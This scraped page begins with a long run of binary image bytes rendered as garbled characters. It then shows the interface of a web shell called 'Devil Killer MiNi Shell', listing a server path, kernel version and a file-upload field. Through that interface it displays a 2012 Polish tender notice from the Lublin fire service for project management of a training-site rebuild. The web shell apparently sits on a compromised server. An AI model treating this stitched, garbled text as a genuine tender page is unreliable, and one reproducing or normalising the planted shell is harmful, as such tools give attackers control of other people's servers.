JFIF ( %!1!%)+...383-7(-.+  -% &5/------------------------------------------------";!1AQ"aq2#3BRrb*!1"AQa2q#B ?yRd&vGlJwZvK)YrxB#j]ZAT^dpt{[wkWSԋ*QayBbm*&0<|0pfŷM`̬ ^.qR𽬷^EYTFíw<-.j)M-/s yqT'&FKz-([lև<G$wm2*e Z(Y-FVen櫧lҠDwүH4FX1 VsIOqSBۡNzJKzJξcX%vZcFSuMٖ%B ִ##\[%yYꉅ !VĂ1َRI-NsZJLTAPמQ:y״g_g= m֯Ye+Hyje!EcݸࢮSo{׬*h g<@KI$W+W'_> lUs1,o*ʺE.U"N&CTu7_0VyH,q ,)H㲣5<t ;rhnz%ݓz+4 i۸)P6+F>0Tв`&i}Shn?ik܀՟ȧ@mUSLFηh_er i_qt]MYhq 9LaJpPןߘvꀡ\"z[VƬ¤*aZMo=WkpSp \QhMb˒YH=ܒ m`CJt 8oFp]>pP1F>n8(*aڈ.Y݉[iTع JM!x]ԶaJSWҼܩ`yQ`*kE#nNkZKwA_7~ ΁JЍ;-2qRxYk=Uր>Z qThv@.w c{#&@#l;D$kGGvz/7[P+i3nIl`nrbmQi%}rAVPT*SF`{'6RX46PԮp(3W҅U\a*77lq^rT$vs2MU %*ŧ+\uQXVH !4t*Hg"Z챮 JX+RVU+ތ]PiJT XI= iPO=Ia3[ uؙ&2Z@.*SZ (")s8Y/-Fh Oc=@HRlPYp!wr?-dugNLpB1yWHyoP\ѕрiHִ,ِ0aUL.Yy`LSۜ,HZz!JQiVMb{( tژ <)^Qi_`: }8ٱ9_.)a[kSr> ;wWU#M^#ivT܎liH1Qm`cU+!2ɒIX%ֳNړ;ZI$?b$(9f2ZKe㼭qU8I[ U)9!mh1^N0 f_;׆2HFF'4b! yBGH_jтp'?uibQ T#ѬSX5gޒSF64ScjwU`xI]sAM( 5ATH_+s 0^IB++h@_Yjsp0{U@G -:*} TނMH*֔2Q:o@ w5(߰ua+a ~w[3W(дPYrF1E)3XTmIFqT~z*Is*清Wɴa0Qj%{T.ޅ״cz6u6݁h;֦ 8d97ݴ+ޕxзsȁ&LIJT)R0}f }PJdp`_p)əg(ŕtZ 'ϸqU74iZ{=Mhd$L|*UUn &ͶpHYJۋj /@9X?NlܾHYxnuXږAƞ8j ໲݀pQ4;*3iMlZ6w ȵP Shr!ݔDT7/ҡϲigD>jKAX3jv+ ߧز #_=zTm¦>}Tց<|ag{E*ֳ%5zW.Hh~a%j"e4i=vױi8RzM75i֟fEu64\էeo00d H韧rȪz2eulH$tQ>eO$@B /?=#٤ǕPS/·.iP28s4vOuz3zT& >Z2[0+[#Fޑ]!((!>s`rje('|,),y@\pЖE??u˹yWV%8mJ iw:u=-2dTSuGL+m<*צ1as&5su\phƃ qYLֳ>Y(PKi;Uڕp ..!i,54$IUEGLXrUE6m UJC?%4AT]I]F>׹P9+ee"Aid!Wk|tDv/ODc/,o]i"HIHQ_n spv"b}}&I:pȟU-_)Ux$l:fژɕ(I,oxin8*G>ÌKG}Rڀ8Frajٷh !*za]lx%EVRGYZoWѮ昀BXr{[d,t Eq ]lj+ N})0B,e iqT{z+O B2eB89Cڃ9YkZySi@/(W)d^Ufji0cH!hm-wB7C۔֛X$Zo)EF3VZqm)!wUxM49< 3Y .qDfzm |&T"} {*ih&266U9* <_# 7Meiu^h--ZtLSb)DVZH*#5UiVP+aSRIª!p挤c5g#zt@ypH={ {#0d N)qWT kA<Ÿ)/RT8D14y b2^OW,&Bcc[iViVdִCJ'hRh( 1K4#V`pِTw<1{)XPr9Rc 4)Srgto\Yτ~ xd"jO:A!7􋈒+E0%{M'T^`r=E*L7Q]A{]A<5ˋ.}<9_K (QL9FЍsĮC9!rpi T0q!H \@ܩB>F6 4ۺ6΋04ϲ^#>/@tyB]*ĸp6&<џDP9ᗟatM'> b쪗wI!܁V^tN!6=FD܆9*? q6h8  {%WoHoN.l^}"1+uJ ;r& / IɓKH*ǹP-J3+9 25w5IdcWg0n}U@2 #0iv腳z/^ƃOR}IvV2j(tB1){S"B\ ih.IXbƶ:GnI F.^a?>~!k''T[ע93fHlNDH;;sg-@, JOs~Ss^H '"#t=^@'W~Ap'oTڭ{Fن̴1#'c>꜡?F颅B L,2~ת-s2`aHQm:F^j&~*Nūv+{sk$F~ؒ'#kNsٗ D9PqhhkctԷFIo4M=SgIu`F=#}Zi'cu!}+CZI7NuŤIe1XT xC۷hcc7 l?ziY䠩7:E>k0Vxypm?kKNGCΒœap{=i1<6=IOV#WY=SXCޢfxl4[Qe1 hX+^I< tzǟ;jA%n=q@j'JT|na$~BU9؂dzu)m%glwnXL`޹W`AH̸뢙gEu[,'%1pf?tJ Ζmc[\ZyJvn$Hl'<+5[b]v efsЁ ^. &2 yO/8+$ x+zs˧Cޘ'^e fA+ڭsOnĜz,FU%HU&h fGRN擥{N$k}92k`Gn8<ʮsdH01>b{ {+ [k_F@KpkqV~sdy%ϦwK`D!N}N#)x9nw@7y4*\ Η$sR\xts30`O<0m~%U˓5_m ôªs::kB֫.tpv쌷\R)3Vq>ٝj'r-(du @9s5`;iaqoErY${i .Z(Џs^!yCϾ˓JoKbQU{௫e.-r|XWլYkZe0AGluIɦvd7 q -jEfۭt4q +]td_+%A"zM2xlqnVdfU^QaDI?+Vi\ϙLG9r>Y {eHUqp )=sYkt,s1!r,l鄛u#I$-֐2A=A\J]&gXƛ<ns_Q(8˗#)4qY~$'3"'UYcIv s.KO!{, ($LI rDuL_߰ Ci't{2L;\ߵ7@HK.Z)4
Devil Killer Is Here MiNi Shell

MiNi SheLL

Current Path : /home/vmanager/www/common/web/tenders/20120411/

Linux 9dbcd5f6333d 5.15.0-124-generic #134-Ubuntu SMP Fri Sep 27 20:20:17 UTC 2024 x86_64
Upload File :
Current File : /home/vmanager/www/common/web/tenders/20120411/82133-N-2012.html

<p class="kh_header"><b>Lublin: Usługa zarządzania projektem pn. Stworzenie strefy bezpieczeństwa publicznego na ul. Metalurgicznej w Lublinie etap: Adaptacja przestrzeni wraz 
z rewitalizacją obiektów po byłej bazie transportu URSUS dla potrzeb PSP na cele szkoleniowo-dydaktyczne, (nr sprawy WL-2370/16/12)</b><br>
<b>Numer ogłoszenia: 82133 - 2012; data zamieszczenia: 11.04.2012</b><br>
OGŁOSZENIE O ZAMÓWIENIU - usługi<br><br></p>

<p><b>Zamieszczanie ogłoszenia:</b> obowiązkowe.</p>
<p><b>Ogłoszenie dotyczy:</b> zamówienia publicznego.</p>

<p class="kh_title">SEKCJA I: ZAMAWIAJĄCY</p>

<p><b>I. 1) NAZWA I ADRES:</b> Komenda Wojewódzka Państwowej Straży Pożarnej w Lublinie , ul. Strażacka 7, 20-012 Lublin, woj. lubelskie, tel. 081 5351240.</p>
<ul class="kh_indent_1">
<li><b>Adres strony internetowej zamawiającego:</b> www.straz.lublin.pl, www.kwpsp-lublin.netbip.pl</li></ul>
<p><b>I. 2) RODZAJ ZAMAWIAJĄCEGO:</b> Administracja rządowa terenowa.</p>

<p class="kh_title">SEKCJA II: PRZEDMIOT ZAMÓWIENIA</p>

<p><b>II.1) OKREŚLENIE PRZEDMIOTU ZAMÓWIENIA</b></p>
<p><b>II.1.1) Nazwa nadana zamówieniu przez zamawiającego:</b> Usługa zarządzania projektem pn. Stworzenie strefy bezpieczeństwa publicznego na ul. Metalurgicznej w Lublinie etap: Adaptacja przestrzeni wraz 
z rewitalizacją obiektów po byłej bazie transportu URSUS dla potrzeb PSP na cele szkoleniowo-dydaktyczne, (nr sprawy WL-2370/16/12).</p>
<p><b>II.1.2) Rodzaj zamówienia:</b> usługi.</p>
<p><b>II.1.3) Określenie przedmiotu oraz wielkości lub zakresu zamówienia:</b> Przedmiotem zamówienia jest usługa zarządzania projektem pn. Stworzenie strefy bezpieczeństwa publicznego na ul. Metalurgicznej w Lublinie etap: Adaptacja przestrzeni wraz z rewitalizacją obiektów po byłej bazie transportu URSUS dla potrzeb PSP na cele szkoleniowo-dydaktyczne.
1. Informacje dotyczące Projektu i jego realizacji. 
Nazwa projektu: Stworzenie strefy bezpieczeństwa publicznego na ul. Metalurgicznej w Lublinie etap: Adaptacja przestrzeni wraz z rewitalizacją obiektów po byłej bazie transportu URSUS dla potrzeb PSP na cele szkoleniowo-dydaktyczne, zwany dalej Projektem.
Projekt realizowany jest w ramach Osi Priorytetowej III Atrakcyjność obszarów miejskich i tereny inwestycyjne, Działania 3.2. Rewitalizacja zdegradowanych obszarów miejskich, Regionalnego Programu Operacyjnego Województwa Lubelskiego na lata 2007-2013.
Przedmiotem Projektu są roboty budowlane, które będą realizowane 
w formule -zaprojektuj i wybuduj-. 
Okres realizacji Projektu:
- zakończenie rzeczowe realizacji: 30 czerwca 2013 r.
- zakończenie finansowe realizacji: 12 lipca 2013 r.
W dniu 30 marca 2012 r. Zamawiający podpisał umowę na wykonanie całości robót budowlanych będących przedmiotem Projektu na Zaprojektowanie i wykonanie robót  budowlanych rewitalizacji trzech obiektów i otaczającego je terenu, zlokalizowanych przy ul. Metalurgicznej 7 Lublinie, zwaną dalej umową na zaprojektowanie i wykonanie robót budowlanych.
Przedmiotem umowy na zaprojektowanie i wykonanie robót budowlanych jest wykonanie dokumentacji projektowej, pełnienie nadzoru autorskiego oraz  wykonanie robót budowlanych  łącznie z uzyskaniem opinii, opracowań, uzgodnień, pozwoleń, decyzji, wypisów, map, warunków technicznych związanych z przyłączeniem obiektu do istniejących sieci, opracowaniem dokumentacji i inwentaryzacji powykonawczej, opracowaniem świadectwa charakterystyki energetycznej obiektu oraz uzyskanie pozwolenia na użytkowanie obiektu.
Dokumentacja projektowa winna zostać opracowana zgodnie z wymaganiami 
i oczekiwaniami Zamawiającego zawartymi w Programie Funkcjonalno - Użytkowym z uwzględnieniem wyposażenia technologicznego oraz obowiązującymi w tym zakresie przepisami prawa w tym przepisów resortowych dotyczących m.in. wytycznych w sprawie standardów technicznych, funkcjonalnych i użytkowych obowiązujących w obiektach Państwowej Straży Pożarnej.
2. Informacje dotyczące zarządzania Projektem.

Zarządzanie Projektem obejmuje:

1) kompleksowe zarządzanie Projektem w imieniu i na rzecz Zamawiającego w ścisłej z nim współpracy mające na względzie prawidłowe realizowanie i ukończenie Projektu, które będzie obejmowało w szczególności:
a) organizację,
b) koordynację,
c) nadzór,
d) monitoring, raportowanie i sprawozdawczość w zakresie rzeczowym, czasowym 
i finansowym;
2) ścisłą współpracę z autorami Programu Funkcjonalno-Użytkowego zadania oraz wykonawcą umowy na zaprojektowanie i wykonanie robót budowlanych przy wykonywaniu czynności związanych z zaprojektowaniem i wybudowaniem przedmiotu zadania, z opracowaniem dokumentacji projektowej oraz w zakresie sprawowanego przez niego nadzoru autorskiego;
3) profesjonalny i kompetentny nadzór inwestorski nad dokumentacją projektową 
i robotami budowlanymi w branży konstrukcyjno-budowlanej, elektrycznej, sanitarnej 
i drogowej zgodnie z przepisami prawa obowiązującego w Polsce, w szczególności 
z ustawą z dnia 7 lipca 1994 r. Prawo budowlane (tekst jedn.: Dz. U. z 2010 r. Nr 243, poz. 1623 ze zm.), poprzez wyznaczenie ze swego grona inspektorów nadzoru inwestorskiego i zapewnienie koordynacji ich pracy;
4) administrowanie Projektem;
5) zarządzanie, monitorowanie i kontrola postępu wykonania Projektu, w tym umowy na zaprojektowanie i wykonanie robót budowlanych pod względem organizacyjnym, technicznym, czasowym i finansowym wraz z raportowaniem, które będzie uwzględniać zarówno wskaźniki fizyczne jak i finansowe, koszty, terminy, kontrolę budżetu i działania zapobiegawcze (jeśli będą konieczne);
6) rozliczenie rzeczowe i finansowe Projektu;
7) sporządzanie wniosków o płatność, harmonogramów płatności, raportów 
i sprawozdań;
8) natychmiastowe informowanie Zamawiającego o wszystkich zaistniałych problemach oraz o problemach mogących zaistnieć (w szczególności o wszelkich dostrzeżonych nieprawidłowościach i zagrożeniach co do jakości, zakresu i terminowości realizacji umowy i Projektu), wraz ze sposobami ich rozwiązywania i -lub działaniami korygującymi mającymi na celu usuwanie takich problemów;
9) prowadzenie, przechowywanie i archiwizacja (również na nośniku elektronicznym) korespondencji z podmiotami biorącymi udział w realizacji umowy na zaprojektowanie 
i wykonanie robót budowlanych ze szczególnym uwzględnieniem ostrzeżeń, uwag 
i wniosków kierowanych do wykonawcy tej umowy mogących być dowodami w razie ewentualnych sporów, roszczeń wykonawcy umowy, katastrof budowlanych itp.;
10) szacowanie i weryfikowanie jeśli zajdzie taka konieczność robót dodatkowych zaproponowanych przez Wykonawcę umowy na zaprojektowanie 
i wykonanie robót budowlanych, w zakresie wartości rzeczowych i finansowych, 
z uwzględnieniem konieczności stosowania przez Zamawiającego ustawy Prawo zamówień publicznych;
11) prowadzenie technicznego, finansowego, czasowego i administracyjnego nadzoru nad robotami budowlanymi, egzekwowanie zgodności prowadzonych robót z:
a) pozwoleniem na budowę,
b) projektem (budowlanym i wykonawczym),
c) wszystkimi dokumentami stanowiącymi integralne części Projektu,
d) obowiązującym prawem, normami,
e) zasadami wiedzy inżynierskiej,
f) harmonogramem realizacji Projektu sporządzonym przez Wykonawcę umowy na zaprojektowanie i wykonanie robót budowlanych,
g) harmonogramem rzeczowo - finansowym realizacji Projektu, stanowiącym załącznik do umowy o dofinansowanie Projektu,
h) procedurami obowiązującymi przy realizacji projektów finansowanych w ramach Europejskiego Funduszu Rozwoju Regionalnego,
i) wymaganiami i wytycznymi Instytucji Zarządzającej Regionalnego Programu Operacyjnego Województwa Lubelskiego na lata 2007-2013,
j) wszystkimi dokumentami stanowiącymi integralne części Projektu,
k) warunkami umowy na zaprojektowanie i wykonanie robót budowlanych oraz umową 
o dofinansowanie Projektu z Europejskiego Funduszu Rozwoju Regionalnego w ramach Regionalnego Programu Operacyjnego Województwa Lubelskiego 2007-2013;
12) realizacja zobowiązań, praw i obowiązków Zamawiającego związanych z realizacją Projektu i wynikających w szczególności:
a) z umowy zawartej przez Zamawiającego o dofinansowanie Projektu z Województwem Lubelskim  nr 03/10-UDA-RPLU.03.02.00-06-085/10-00-0560 z dnia 16.12.2011r., 
b) z wniosku o dofinansowanie Projektu ze środków Europejskiego Funduszu Rozwoju
Regionalnego w ramach Regionalnego Programu Operacyjnego Województwa Lubelskiego na lata 2007-2013 nr 03/10-WND-RPLU.03.02.00-06-085/10 wraz z załącznikami, 
c) z obowiązujących przepisów prawa, w tym przepisów ustawy Prawo budowlane, ustawy Prawo zamówień publicznych;
13) wspierania działań Zamawiającego we wszystkich czynnościach organizacyjnych, technicznych, administracyjnych i finansowych w trakcie realizacji Projektu oraz związanych z realizacją i kontrolą Projektu po jego zakończeniu przez służby kontrolne;
14) występowanie w imieniu i na rzecz Zamawiającego przed organami administracji 
i przed sądami, w sprawach wynikających z realizacji Projektu, w granicach udzielonych pełnomocnictw;
15) udział, na żądanie Zamawiającego, w kontrolach dotyczących realizacji Projektu, przeprowadzanych przez Instytucję Zarządzającą Regionalnego Programu Operacyjnego Województwa Lubelskiego na lata 2007-2013 lub na jej zlecenie oraz inne podmioty zewnętrzne uprawnione do jej przeprowadzenia na podstawie odrębnych przepisów 
i przedstawianie na bieżąco wszelkich informacji, dokumentów i wyjaśnień;
16) stosowanie się do obowiązujących i aktualnych wzorów dokumentów oraz informacji
Instytucji Zarządzającej Regionalnego Programu Operacyjnego Województwa Lubelskiego na lata 2007-2013;
17) prowadzenie korespondencji związanej z realizacją Projektu;
18) kontrolowanie prawidłowego prowadzenia dokumentów budowy;
19) gromadzenie, przechowywanie, ewidencjonowanie i zabezpieczanie dokumentacji związanej z realizacją Projektu (w tym między innymi: korespondencji, dokumentacji aplikacyjnej, monitoringowej, kontrolnej, fotograficznej z postępu robót, audytowej, umów o dofinansowanie wraz z aneksami) oraz protokolarne przekazanie tej dokumentacji Zamawiającemu po zakończeniu Projektu lub rozwiązaniu umowy 
z Zamawiającym;
20) wykonywania usługi zgodnie z przepisami polskiego prawa w tym Prawa budowlanego wraz z przepisami wykonawczymi, Prawa zamówień publicznych wraz 
z przepisami wykonawczymi, Kodeksu cywilnego, procedurami Europejskiego Funduszu Rozwoju Regionalnego Unii Europejskiej;
21) udzielanie Zamawiającemu odpowiedzi - na piśmie, w terminie do 3 dni roboczych liczonych od dnia otrzymania wniosku, pisma lub innego dokumentu;
22) zatwierdzenie przez Zamawiającego dokumentów i decyzji na każdym etapie pełnienia funkcji, nie zwalnia Zarządzającego Projektem z odpowiedzialności za prawidłowość tych dokumentów i decyzji, w szczególności z rękojmi za wady oraz kar umownych..</p>
<p><b>II.1.4) Czy przewiduje się udzielenie zamówień uzupełniających:</b> nie.</p>

<p><b>II.1.5) Wspólny Słownik Zamówień (CPV):</b> 71.24.80.00-8, 71.24.70.00-1, 71.24.00.00-2, 71.52.00.00-9, 71.54.00.00-5, 71.30.00.00-1.</p>
<p><b>II.1.6) Czy dopuszcza się złożenie oferty częściowej:</b> nie.</p>
<p><b>II.1.7) Czy dopuszcza się złożenie oferty wariantowej:</b> nie.</p><br>
<p><b>II.2) CZAS TRWANIA ZAMÓWIENIA LUB TERMIN WYKONANIA:</b> Zakończenie: 12.07.2013.</p>

<p class="kh_title">SEKCJA III: INFORMACJE O CHARAKTERZE PRAWNYM, EKONOMICZNYM, FINANSOWYM I TECHNICZNYM</p>


<p><b>III.2) ZALICZKI</b></p>
<ul class="kh_indent_1"><li><b>Czy przewiduje się udzielenie zaliczek na poczet wykonania zamówienia:</b> nie</li></ul>
<p><b>III.3) WARUNKI UDZIAŁU W POSTĘPOWANIU ORAZ OPIS SPOSOBU DOKONYWANIA OCENY SPEŁNIANIA TYCH WARUNKÓW</b></p>
<ul class="kh_indent_1">
<li><p><b>III.3.2) Wiedza i doświadczenie</b></p>
<p><b>Opis sposobu dokonywania oceny spełniania tego warunku</b></p>
<ul class="kh_indent_1"><li><p>Wykonanie (zakończenie) w ciągu ostatnich trzech lat przed upływem terminu składania ofert, a jeżeli okres prowadzenia działalności jest krótszy - w tym okresie co najmniej 1 usługi zarządzania umową na roboty budowlane, która łącznie musi spełniać następujące warunki:
a) wartość umowy - co najmniej 5 000 000 PLN brutto albo równowartość tej kwoty wyrażona w innej walucie wg kursu Narodowego Banku Polskiego w dniu ogłoszenia w Biuletynie Zamówień Publicznych
b) przedmiot umowy - roboty budowlane w rozumieniu art. 2 pkt 8 ustawy Prawo zamówień publicznych</p>
</li></ul></li><li><p><b>III.3.4) Osoby zdolne do wykonania zamówienia</b></p>
<p><b>Opis sposobu dokonywania oceny spełniania tego warunku</b></p>
<ul class="kh_indent_1"><li><p>Wykonawcy muszą wykazać, że dysponują lub będą dysponować osobami na
pełnienie następujących funkcji:
a) jeden Kierownik Zespołu Zarządzającego Projektem posiadający:
- wykształcenie wyższe techniczne;
- co najmniej 5-letnie doświadczenie zawodowe na stanowiskach kierowniczych 
w bezpośrednim kierowaniu, zarządzaniu lub nadzorowaniu realizacji inwestycji budowlanych,
b) jeden inspektor nadzoru inwestorskiego (branża konstrukcyjno - budowlana) posiadający:
- uprawnienia budowlane w branży konstrukcyjno - budowlanej bez ograniczeń,
- co najmniej 5-letnie doświadczenie zawodowe  w pełnieniu samodzielnej funkcji technicznej w budownictwie w branży konstrukcyjno - budowlanej
c) jeden inspektor nadzoru inwestorskiego (branża elektryczna) posiadający:
- uprawnienia budowlane w branży elektrycznej bez ograniczeń,
- co najmniej 5-letnie doświadczenie zawodowe  w pełnieniu samodzielnej funkcji technicznej w budownictwie w branży elektrycznej
d) jeden inspektor nadzoru inwestorskiego (branża sanitarna) posiadający:
- uprawnienia budowlane w branży sanitarnej bez ograniczeń,
- co najmniej 5-letnie doświadczenie zawodowe  w pełnieniu samodzielnej funkcji technicznej w budownictwie w branży sanitarnej
e) jeden inspektor nadzoru inwestorskiego (branża drogowa) posiadający:
- uprawnienia budowlane w branży drogowej bez ograniczeń,
- co najmniej 5-letnie doświadczenie zawodowe  w pełnieniu samodzielnej funkcji technicznej w budownictwie w branży drogowej
f) jeden specjalista do spraw rozliczeń finansowych inwestycji posiadający:
- wykształcenie wyższe,
- co najmniej 2 lata doświadczenia na stanowisku związanym z rozliczaniem inwestycji
- doświadczenie w rozliczeniu dokumentacyjno - finansowym, sprawozdawczości, monitoringu w zakresie co najmniej jednej zakończonej inwestycji współfinansowanej ze
środków Unii Europejskiej
oraz 
oświadczą, że osoby które będą uczestniczyć w wykonaniu zamówienia, posiadają wymagane prawem uprawnienia w zakresie niezbędnym do realizacji przedmiotu zmówienia.
Zamawiający dopuszcza łączenie maksymalnie 2 funkcji wymienionych w lit. a-f przez jedną osobę w przypadku, gdy przewidziana przez Wykonawcę dana osoba posiada łącznie wymagane kwalifikacje zawodowe, wykształcenie 
i doświadczenie zawodowe.</p>
</li></ul></li><li><p><b>III.3.5) Sytuacja ekonomiczna i finansowa</b></p>
<p><b>Opis sposobu dokonywania oceny spełniania tego warunku</b></p>
<ul class="kh_indent_1"><li><p>Posiadanie ubezpieczenia od odpowiedzialności cywilnej w zakresie prowadzonej działalności na kwotę co najmniej 100 000 PLN lub jej równowartość wyrażoną 
w innej walucie wg kursu Narodowego Banku Polskiego w dniu ogłoszenia 
w Biuletynie Zamówień Publicznych.</p>
</li></ul></li></ul>
<p><b>III.4) INFORMACJA O OŚWIADCZENIACH LUB DOKUMENTACH, JAKIE MAJĄ DOSTARCZYĆ WYKONAWCY W CELU POTWIERDZENIA SPEŁNIANIA WARUNKÓW UDZIAŁU W POSTĘPOWANIU ORAZ NIEPODLEGANIA WYKLUCZENIU NA PODSTAWIE ART. 24 UST. 1 USTAWY</b></p>
<ul class="kh_indent_1"><li>
<p><b>III.4.1) W zakresie wykazania spełniania przez wykonawcę warunków, o których mowa w art. 22 ust. 1 ustawy, oprócz oświadczenia o spełnieniu warunków udziału w postępowaniu, należy przedłożyć:</b></p>
<ul style="text-align: justify; margin-right: 20px; list-style: disc;">
<li  style="margin-bottom: 12px;">wykaz wykonanych, a w przypadku świadczeń okresowych lub ciągłych również wykonywanych, dostaw lub usług  w zakresie niezbędnym do wykazania spełniania warunku wiedzy i doświadczenia w okresie ostatnich trzech lat przed upływem terminu składania ofert albo wniosków o dopuszczenie do udziału w postępowaniu, a jeżeli okres prowadzenia działalności jest krótszy - w tym okresie, z podaniem ich wartości, przedmiotu, dat wykonania i odbiorców, oraz załączeniem dokumentu potwierdzającego, że te dostawy lub usługi zostały wykonane lub są wykonywane należycie</li>

<li  style="margin-bottom: 12px;">wykaz osób, które będą uczestniczyć w wykonywaniu zamówienia, w szczególności odpowiedzialnych za świadczenie usług, kontrolę jakości lub kierowanie robotami budowlanymi, wraz z informacjami na temat ich kwalifikacji zawodowych, doświadczenia i wykształcenia niezbędnych dla wykonania zamówienia, a także zakresu wykonywanych przez nie czynności, oraz informacją o podstawie do dysponowania tymi osobami</li>

<li  style="margin-bottom: 12px;">oświadczenie, że osoby, które będą uczestniczyć w wykonywaniu zamówienia, posiadają wymagane uprawnienia, jeżeli ustawy nakładają obowiązek posiadania takich uprawnień</li>

<li  style="margin-bottom: 12px;">opłaconą polisę, a w przypadku jej braku inny dokument potwierdzający, że wykonawca jest ubezpieczony od odpowiedzialności cywilnej w zakresie prowadzonej działalności związanej z przedmiotem zamówienia</li>

</ul></li>

<li><p><b>III.4.2) W zakresie potwierdzenia niepodlegania wykluczeniu na podstawie art. 24 ust. 1 ustawy, należy przedłożyć:</b></p>

<ul style="text-align: justify; margin-right: 20px; list-style: disc"><li style="margin-bottom: 12px;">oświadczenie o braku podstaw do wykluczenia</li>

<li style="margin-bottom: 12px;">aktualny odpis z właściwego rejestru, jeżeli odrębne przepisy wymagają wpisu do rejestru, w celu wykazania braku podstaw do wykluczenia w oparciu o art. 24 ust. 1 pkt 2 ustawy, wystawiony nie wcześniej niż 6 miesięcy przed upływem terminu składania wniosków o dopuszczenie do udziału w postępowaniu o udzielenie zamówienia albo składania ofert, a w stosunku do osób fizycznych oświadczenie w zakresie art. 24 ust. 1 pkt 2 ustawy</li>

<li style="margin-bottom: 12px;">wykonawca powołujący się przy wykazywaniu spełniania warunków udziału w postępowaniu na potencjał innych podmiotów, które będą brały udział w realizacji części zamówienia, przedkłada także dokumenty dotyczące tego podmiotu w zakresie wymaganym dla wykonawcy, określonym w pkt III.4.2.</li>

</ul></li>
<li>
<p class="bold">III.4.3) Dokumenty podmiotów zagranicznych</p>
<p class="bold">Jeżeli wykonawca ma siedzibę lub miejsce zamieszkania poza terytorium Rzeczypospolitej Polskiej, przedkłada:</p>
<p class="bold">III.4.3.1)  dokument wystawiony w kraju, w którym ma siedzibę lub miejsce zamieszkania potwierdzający, że:</p>
<ul style="text-align: justify; margin-right: 20px; list-style: disc;">
<li style="margin-bottom: 12px;">nie otwarto jego likwidacji ani nie ogłoszono upadłości - wystawiony nie wcześniej niż 6 miesięcy przed upływem terminu składania wniosków o dopuszczenie do udziału w postępowaniu o udzielenie zamówienia albo składania ofert</li>

</ul></li>
</ul>
<p class="bold">III.6) INNE DOKUMENTY</p>
<p class="bold">Inne dokumenty niewymienione w pkt III.4) albo w pkt III.5)</p>
<p>Dokumenty wykonawców ubiegających się wspólnie o udzielenie zamówienia (konsorcja, spólki cywilne):
Wykonawcy wspólnie ubiegający się o udzielenie zamówienia składają indywidualnie: oświadczenie o spełnieniu warunków udziału w postępowaniu oraz dokumenty potwierdzające brak podstaw do wykluczenia z postępowania. Pozostałe dokumenty wykonawcy ci mogą złożyć łącznie, z zastrzeżeniem poniższym.
Polisę ubezpieczeniową (lub inny dokument potwierdzający, że wykonawca jest ubezpieczony od odpowiedzilaności cywilnej) wykonawcy wspólnie ubiegający się o udzielenie zamówienia mogą złożyć wg następujących zasad:
- jedna polisa, w której ubezpieczonymi są wszyscy Wykonawcy wspólnie ubiegający się o udzielenie zamówienia opiewająca na kwotę co najmniej 100 000 PLN (lub jej równowartość wyrażoną w innej walucie wg kursu Narodowego Banku Polskiego w dniu ogłoszenia w Biuletynie Zamówień Publicznych) lub
- odrębne polisy ubezpieczeniowe każdego z Wykonawców wspólnie ubiegających się o udzielenie zamówienia, których łączna kwota po zsumowaniu jest nie mniejsza niż 100 000 PLN (lub jej równowartość wyrażona 
w innej walucie wg kursu Narodowego Banku Polskiego w dniu ogłoszenia w Biuletynie Zamówień Publicznych).</p>
<p><b>III.7) Czy ogranicza się możliwość ubiegania się o zamówienie publiczne tylko dla wykonawców, u których ponad 50 % pracowników stanowią osoby niepełnosprawne: </b>nie</p>


<p class="kh_title">SEKCJA IV: PROCEDURA</p>
<p><b>IV.1) TRYB UDZIELENIA ZAMÓWIENIA</b></p>
<p><b>IV.1.1) Tryb udzielenia zamówienia:</b> przetarg nieograniczony.</p>

<p><b>IV.2) KRYTERIA OCENY OFERT</b></p>
<p><b>IV.2.1) Kryteria oceny ofert: </b>najniższa cena.</p>
<p><b>IV.2.2) Czy przeprowadzona będzie aukcja elektroniczna:</b> nie.</p>
<p><b>IV.3) ZMIANA UMOWY</b></p>
<p><b>Czy przewiduje się istotne zmiany postanowień zawartej umowy w stosunku do treści oferty, na podstawie której dokonano wyboru wykonawcy: </b>tak</p>
<p><b>Dopuszczalne zmiany postanowień umowy oraz określenie warunków zmian</b></p>
<p>1. Zgodnie z art. 144 ustawy Prawo zamówień publicznych Zamawiający dopuszcza możliwość dokonania czynności prawnej polegającej na zmianie postanowień zawartej umowy w sprawie zamówienia publicznego w stosunku do treści oferty, na podstawie której dokonano wyboru Wykonawcy.
2. Zamawiający określa następujące warunki, w jakich przewiduje możliwość dokonania zmian zawartej umowy:
2.1) konieczność przedłużenia terminu umownego zakończenia przedmiotu zamówienia z uwagi na:
a) wydłużenie terminu zakończenia realizacji zadań objętych Projektem z przyczyn niezależnych od Wykonawcy;
b) zmiany harmonogramu realizacji Projektu;
c) opóźnienia w rozpoczęciu lub w trakcie realizacji Projektu, odbiorach Projektu, uzyskaniu pozwolenia na użytkowanie lub zgłoszenia zakończenia robót, końcowego rozliczenia Projektu - o ile opóźnienie nie wynika z przyczyn leżących po stronie Wykonawcy;
d) wystąpienia zmian w dokumentacji projektowej, wystąpienia robót dodatkowych niezbędnych do wykonania Projektu, opóźniających lub wstrzymujących realizację zamówienia podstawowego objętego umową na zaprojektowanie i wykonanie robót budowlanych, mających wpływ na uzgodniony termin zakończenia jego realizacji;
e) uwarunkowania społeczne np. protesty, strajki itp.;
f) korzystanie przez osoby uprawnione ze środków prawnych przewidzianych przez obowiązujące przepisy prawne (w szczególności: odwołania do KIO, powództwa sądowe)
g) wystąpienie siły wyższej. Przez siłę wyższa rozumie się zdarzenie lub połączenie zdarzeń obiektywnie niezależnych od stron, które zasadniczo i istotnie utrudniają wykonanie części lub całości zobowiązań wynikających z umowy, których strony nie mogły wcześniej przewidzieć i których nie mogły przeciwdziałać poprzez działanie z należytą starannością ogólnie przewidzianą dla cywilnoprawnych stosunków zobowiązaniowych o okres opóźniający lub wstrzymujący realizację zamówienia;
2.2) zmianę wynagrodzenia Wykonawcy w przypadku zmiany ustawowej stawki podatku VAT. W takim przypadku obniżenie lub podwyższenie wynagrodzenia odbędzie się w wysokości odpowiadającej zmianie podatku.
2.3) wystąpienia konieczności zmiany osób wskazanych w ofercie (śmierć, choroba, ustanie stosunku pracy lub inne zdarzenie losowe i przyczyny niezależne od Wykonawcy) przy pomocy, których Wykonawca realizuje przedmiot umowy.
W wypadku zmiany osób przy pomocy, których Wykonawca realizuje przedmiot umowy wymienionych w ofercie Wykonawcy, nowe osoby powołane do pełnienia obowiązków muszą spełniać na dzień składania ofert wymagania określone w SIWZ dla pełnienia danej funkcji;
2.4) wystąpienia zmian powszechnie obowiązujących przepisów prawa, bądź wytycznych Instytucji Zarządzającej RPO Województwa Lubelskiego 2007-2013 w zakresie mającym wpływ na realizację przedmiotu umowy.
